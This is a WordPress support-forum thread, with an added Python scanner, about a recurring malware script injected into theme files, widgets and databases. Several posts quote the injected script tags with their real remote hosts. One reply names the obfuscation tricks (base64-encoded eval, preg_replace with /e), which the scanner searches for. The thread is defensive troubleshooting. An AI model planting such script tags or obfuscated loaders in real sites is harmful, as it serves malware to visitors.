WordPress.org

Forums

Malware links script from www.argoauto.net (23 posts)

  1. mistercooper
    Member
    Posted 1 year ago #

    This morning my site had this as the first line of code

    <script type="text/javascript" src="http://argoauto.net/tmp/index-bkp.php"></script>

    and Google chrome is throwing malware warnings.

    Can't find it in the header or functions files... Anyone else encountered this bug?

    Thanks
    Cooper

  2. cdanni
    Member
    Posted 1 year ago #

    This showed up on one of my sites today as well. I found the code in a footer widget. No idea how it got there.

  3. mistercooper
    Member
    Posted 1 year ago #

    Thank you, I will look there!

    Out of curiosity what version of WordPress is your install running? This client is on 3.3.1 and I'm wondering if this is still a vulnerability in the latest version.

  4. mistercooper
    Member
    Posted 1 year ago #

    Can you elaborate just a little bit on which file you found the script link in? I'm having trouble locating it.

    Thanks
    Cooper

  5. jzn21
    Member
    Posted 1 year ago #

    I got a Google warning because of malicious scripts on my website and indeed in the header.php of the theme file I saw this code:

    <script type="text/javascript" src=[ redacted, you don't need to post that here ]"></script>

    I am using an Artisteer generated template with the newest version of WordPress 3.4.2 and these plugins:

    All in One SEO Pack 1.6.15.2
    Google XML Sitemaps 3.2.8
    Hyper Cache 2.9.0.3
    Jigowatt WordPress Ajax Contact Forms 1.2.3
    MailChimp Widget 0.8.12
    Newsletters Tribulant 3.9.4
    Print Friendly and PDF 3.1.3
    Social Media Widget 2.9.4
    WP Simple Survey 2.2.9
    WP to Twitter 2.4.13

    Any similarities?

  6. funkytime
    Member
    Posted 1 year ago #

    Same here, it's in the Adspace Widget! For some reason in the 'adspace below article' option there is a link/script to argoauto.net.

  7. funkytime
    Member
    Posted 1 year ago #

    make sure you change your password, someone or a script cracked your password.

  8. yabwee
    Member
    Posted 1 year ago #

    I just found that line today in the top of my theme's (Suffusion) index.php. It's the 2nd time such a script has popped up there in the past 2 months. I'd love to figure out how it's getting there.

  9. mistercooper
    Member
    Posted 1 year ago #

    @jzn21, I don't think we have any plug ins or even wordpress version in common.

  10. iwo-trabka
    Member
    Posted 1 year ago #

    Same in my wp. Newest wp - version 3.4.2
    In my theme index.php there was this line with js at the top.
    Any solution for the future?
    Is this some wp bug?

  11. kstadden
    Member
    Posted 1 year ago #

    Seems like a hosting issue to me. I've contacted GoDaddy about it (via a trouble ticket, since their help line gives only a busy signal, a highly unusual sign that something's going on).

    Argoauto.net should be blacklisted by their servers, I think.

  12. kmessinger
    Volunteer Moderator
    Posted 1 year ago #

  13. ken.crosby.evb
    Member
    Posted 1 year ago #

    This shows up in my Malware search in Developer tools and a few other sites. I am unable to find 'argoauto.net' in any searches of my files or my database. Where could this be hiding? If it is gone from my files, does anyone know how it got there? Any solutions to block this?

  14. funkytime
    Member
    Posted 1 year ago #

    Have a similar script that gets added, in the 'Adspace below Article' <script type="text/javascript" src="http://61.19.251.27/web/cb.php"></script>
    This has been happening for about 4 weeks; at the beginning it was the argoauto.net script.
    I have the latest wordpress and those plugins in common with jzn21

    All in One SEO Pack 1.6.15.2
    Google XML Sitemaps
    MailChimp Widget 0.8.12
    WP to Twitter 2.4.13

  15. mistercooper
    Member
    Posted 1 year ago #

    This is consistent with my infection. Removed the argoauto.net script when it popped up a couple weeks ago, today the

    <script type="text/javascript" src="redacted"></script>

    popped up. Both times it was the first line of index.php in the theme file.

  16. ken.crosby.evb
    Member
    Posted 1 year ago #

    Same exact thing happened to me.... First argoauto.net and now:
    <script type="text/javascript" src="http://61.19.251.27/web/cb.php"></script>

    This is the third time the site was blocked for malware.

    I did not find this in any of my files but in my database. I removed it from there and now my site is back up but has anyone found where this vulnerability might be? I have many plugins on the site and I am not sure where to begin to look.

    This site is enormous and I am afraid to do a complete reinstall... Any help would be greatly appreciated.

  17. woodwc
    Member
    Posted 1 year ago #

    Got that same script, same malware warning from Google. I deleted that script, which was at the very top of index.php in the main theme file. My host, bluehost.com, is not being very helpful: sent a standard "how to deal with a hack" support email. And yes, I'll go do all that, but wow, what a pain. I have pretty good backups to restore, but somehow I think the vulnerability will still be there.

    Basics: Running WordPress 3.4.2 with Weaver II Pro
    Hosted by Bluehost
    Lots of plugins, notably Contact Form 7 and Google Calendar Events

  18. woodwc
    Member
    Posted 1 year ago #

    funkytime said: "make sure you change your password, someone or a script cracked your password."

    and that seems sound, and yet I have to ask (naive security question) "how"? I was using a nine-character password with upper- and lower-case letters, at least one number, and at least one special symbol. I didn't write it down anywhere. It should have taken thousands and thousands of attempts to crack it -- shouldn't that have alerted somebody to a security problem?

    Or, to put it another way: Does alien injected code in index.php mean somebody surely has my password? Or is it more likely that some other vulnerability did it, like excessive permissions for a plugin?

    I am curious about this, not trying to be cute or snippy. When I foul up my own passwords, I usually get locked out after a handful of unsuccessful logins -- how is some hacker getting thousands and thousands of attempts?

  19. mvandemar
    Member
    Posted 1 year ago #

    Does alien injected code in index.php mean somebody surely has my password?

    No, there are many ways you can get hacked, although if you are running Windows and get a virus then it is possible for that virus to steal your password, regardless of how strong it was. If you log in or use ftp over an unsecured wireless network (Starbucks or Panera, for example) it can get stolen that way as well.

    If you're hosting on Bluehost then odds are it is not an insecurity with the server (their servers are underpowered imo, but safe). If it wasn't a virus or other password theft then most likely it would have been a script exploit, which means just fixing the visible hack won't be enough. You should do a complete rebuild of the main site (fresh core WordPress, all fresh plugins) and carefully check the theme and uploads. Also, if you are hosting more than 1 domain on that account you will need to go through the others as well to make sure nothing else was affected.

    @ken.crosby.evb -

    This shows up in my Malware search in Developer tools and a few other sites. I am unable to find 'argoauto.net' in any searches of my files or my database. Where could this be hiding?

    Sometimes code like this will be encrypted, where you won't see it directly in either the php or the database, and it only shows once WordPress has processed the php. The most common ways are either through using long random looking base64 encoded strings (typically implemented as eval(base64_decode("... snippets), or via a line that starts like this: preg_replace("/.*/e","\x65\x76\x61.
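
Added example, not part of the thread and not posted by any participant: a Python scanner for the two hiding places named in the reply above. It decodes `base64_decode("...")` literals and `\xNN` escapes in a PHP file or database dump before looking for script tags, which is why a plain search for the domain can come up empty. The sample file and the host `injected.example` are constructed placeholders.

```python
import base64
import re

B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=\s]+)["\']')
HEX_RUN = re.compile(r'(?:\\x[0-9A-Fa-f]{2}){4,}')
PREG_E = re.compile(r'preg_replace\(\s*(["\'])/[^"\']*/[a-zA-Z]*e[a-zA-Z]*\1')
SCRIPT_SRC = re.compile(r'<script[^>]+src=["\']?(https?://[^"\'\s>]+)', re.I)

def unhex(text):
    """Expand PHP-style \\xNN escapes so hidden strings become searchable."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), text)

def scan(source):
    """Return (line, kind, detail) findings for one PHP file or database dump."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        layers = [line]  # the raw line plus every decoded form of it
        for m in B64_CALL.finditer(line):
            try:
                decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace")
            except ValueError:  # not valid base64 after all
                continue
            layers.append(decoded)
            findings.append((lineno, "base64_decode literal", decoded[:60]))
        hex_run = HEX_RUN.search(line)
        if hex_run:
            layers.append(unhex(line))
            findings.append((lineno, "hex-escaped string", unhex(hex_run.group(0))))
        if PREG_E.search(line):
            findings.append((lineno, "preg_replace with /e modifier", ""))
        for layer in layers:
            for m in SCRIPT_SRC.finditer(layer):
                findings.append((lineno, "script tag with remote src", m.group(1)))
    return findings

# Constructed sample of a tampered theme index.php; injected.example is a placeholder.
_TAG = '<script type="text/javascript" src="http://injected.example/x.php"></script>'
SAMPLE = (
    '<?php eval(base64_decode("'
    + base64.b64encode(f"echo '{_TAG}';".encode()).decode()
    + '")); ?>\n'
    + r'<?php preg_replace("/.*/e","\x65\x76\x61\x6c\x28\x31\x29","x"); ?>' + "\n"
    + "<?php get_header(); ?>\n"
)

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Every remote script tag is reported, including legitimate ones, so the output is a list to review against the scripts the theme is known to load.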

  20. woodwc
    Member
    Posted 1 year ago #

    Thanks, that's helpful. So I guess when a password gets compromised, it's not usually a brute-force attack.

    I haven't seen much more about this particular exploit, so I guess it's not as widespread as that timthumb.php business. Basic measures seem to have the malicious code gone from my site, and when I get some time away from my day job I'll do more. (Volunteer webmaster, little community site . . . you get the picture.)

  21. rouckders242
    Member
    Posted 1 year ago #

    I just found this script inserted in our website. It created a text widget under one of our sidebars. No one seems to have a solution for this at the moment.

  22. mistercooper
    Member
    Posted 1 year ago #

    The latest line is <script type="text/javascript" src="http://denybonfante.com/app/Menu.php"></script>. Still no clue where it comes from. About once a month they appear at the top of my theme's index.

  23. karjogedhe
    Member
    Posted 1 year ago #

    I have removed the line <script type="text/javascript" src="http://denybonfante.com/app/Menu.php"></script>

    but the web still got Malware detected

    need help here :(

Topic Closed

This topic has been closed to new replies.
